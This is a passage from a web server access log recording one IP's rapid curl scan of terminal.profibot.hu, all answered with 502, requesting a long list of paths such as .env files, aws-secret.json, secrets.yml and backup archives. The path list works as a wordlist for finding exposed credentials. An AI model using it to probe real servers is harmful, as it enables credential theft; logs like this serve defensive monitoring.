185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/internal/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/keys" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:47 +0000] - - 502 - GET https terminal.profibot.hu "/api/private/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/api/src/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/debug" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/api/v2/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/apis/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app-7d66de919618d3830635.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app-order-client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app.yaml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env.example" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env.sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env.save" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app//.env.back" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/code/community/Nosto/Tagging/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/config.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/config/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/config/dev/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/info" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app1-static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app2-static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app_dir/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/app_nginx_static_path/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/application/.env.sample" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/application/.env.save" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/apps/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/apps/client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/Archipel/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/asdf.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/asset_img/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/assets/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index-[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index-[hash].mjs" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index-GquDNGwd.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/assets/js/app.f8ec9fb3.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/assets/js/app.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:48 +0000] - - 502 - GET https terminal.profibot.hu "/assets/vendor-[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/Assignment3/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/Assignment4/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/audio/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/aws-secret.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/aws.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/aws/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/azure/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/as-alias/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/default/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/dev-env/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/empty-values/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/filename/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/override-value/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/babel-plugin-dotenv/test/fixtures/prod-env/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/back-end/app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/back/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/backend/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/backend/config/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/backend/debug" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/backend/src/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/backendfinaltest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/backup.tar.gz" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/backup.zip" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/base_dir/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/basic-network/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/bgoldd/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/bitcoind/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/blankon/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/blob/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/blog/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/blogs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/blue/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/bookchain-client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/Booking/Default.aspx" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/bootstrap/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/boxes/oracle-vagrant-boxes/Kubernetes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/boxes/oracle-vagrant-boxes/OLCNE/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:49 +0000] - - 502 - GET https terminal.profibot.hu "/bucoffea/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build/_app/immutable/chunks/[chunk].[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build/_app/immutable/entry/app.[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build/entry.client-[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build/main.ba0c34b7.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/build/routes/index-[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/cache.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/cardea/backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/cdw-backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/cgi-bin/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/cgi-bin/pass.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch2-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch6-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch6a-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch7-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch7a-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch8-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch8a-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ch8b-mytodo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/Chai/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/challenge/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/challenges/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/charts/liveObjects/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/chat-client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/chiminey/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/chunk-B2FODB4I.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ci/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/client-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/client/mutual-fund-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/client/src/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/ClientApp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/clld_dir/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/cloud/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/cmd/testdata/expected/dot_env/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/code/api/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:50 +0000] - - 502 - GET https terminal.profibot.hu "/code/web/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/CodeGolf.Web/ClientApp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/codenames-frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/collab-connect-web-application/server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/collected_static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/community/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/compose/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config.yaml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env.dev" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env.production" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/aws.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/cache.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/default.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/keys.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/production.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.py" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/ContainerRegistry/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/containers/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/content/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/control/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/core/app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/core/Datavase/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/core/persistence/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https 